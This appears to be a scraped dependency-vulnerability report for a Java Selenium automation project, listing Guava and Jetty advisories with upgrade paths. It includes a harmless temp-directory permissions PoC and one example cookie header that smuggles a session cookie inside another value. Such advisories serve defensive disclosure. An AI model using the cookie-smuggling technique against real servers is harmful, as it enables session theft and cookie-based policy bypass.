Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.google.guava:guava@25.0-jre

…and 49 more

Overview

Affected versions of this package are vulnerable to Information Disclosure. The file permissions on the file created by com.google.common.io.Files.createTempDir allow an attacker running a malicious program co-resident on the same machine to steal secrets stored in this directory. This is because, by default, on unix-like operating systems the /tmp directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system.

PoC

File guavaTempDir = com.google.common.io.Files.createTempDir();
System.out.println("Guava Temp Dir: " + guavaTempDir.getName());
runLS(guavaTempDir.getParentFile(), guavaTempDir); // Prints the file permissions -> drwxr-xr-x
File child = new File(guavaTempDir, "guava-child.txt");
child.createNewFile();
runLS(guavaTempDir, child); // Prints the file permissions -> -rw-r--r--

For Android developers, choosing a temporary directory API provided by Android is recommended, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.

Remediation

There is no fix for com.google.guava:guava. However, in version 30.0 and above, the vulnerable functionality has been deprecated. In oder to mitigate this vulnerability, upgrade to version 30.0 or higher and ensure your dependencies don't use the createTempDir or createTempFile methods.

References

Information Disclosure vulnerability report

low severity

Improper Input Validation

Vulnerable module: org.eclipse.jetty:jetty-client
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.63.0.

Overview

org.eclipse.jetty:jetty-client is an is an asynchronous http client module fro jetty server.

Affected versions of this package are vulnerable to Improper Input Validation due to improper URI paring in the HttpURI class.

Remediation

Upgrade org.eclipse.jetty:jetty-client to version 9.4.47, 10.0.10, 11.0.10 or higher.

References

Improper Input Validation vulnerability report

low severity

Improper Input Validation

Vulnerable module: org.eclipse.jetty:jetty-http
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-http@9.4.32.v20200930

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.63.0.

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Improper Input Validation due to improper URI paring in the HttpURI class.

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.47, 10.0.10, 11.0.10 or higher.

References

Improper Input Validation vulnerability report

low severity

Information Exposure

Vulnerable module: org.eclipse.jetty:jetty-http
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-http@9.4.32.v20200930

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Information Exposure such that nonstandard cookie parsing may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with " (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. Exploiting this vulnerability results in cookies exfiltration and policy based on cookies bypass.

Note: A cookie header such as: DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d" will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies.

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.51, 10.0.14, 11.0.14, 12.0.0.beta0 or higher.

References

Information Exposure vulnerability report

benweese/Java_Automation

Vulnerabilities

Dependencies

Source

Commit

Find, fix and prevent vulnerabilities in your code.

critical severity

Remote Code Execution (RCE)

Detailed paths

Overview

Remediation

References

critical severity

Arbitrary Code Execution

Detailed paths

Overview

Remediation

References

high severity

Cross-site Request Forgery (CSRF)

Detailed paths

Overview

Remediation

References

high severity

Arbitrary Code Execution

Detailed paths

Overview

PoC

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References

high severity

Information Disclosure

Detailed paths

Overview

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

PoC

Details

Remediation

References

high severity

NULL Pointer Dereference

Detailed paths

Overview

PoC

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References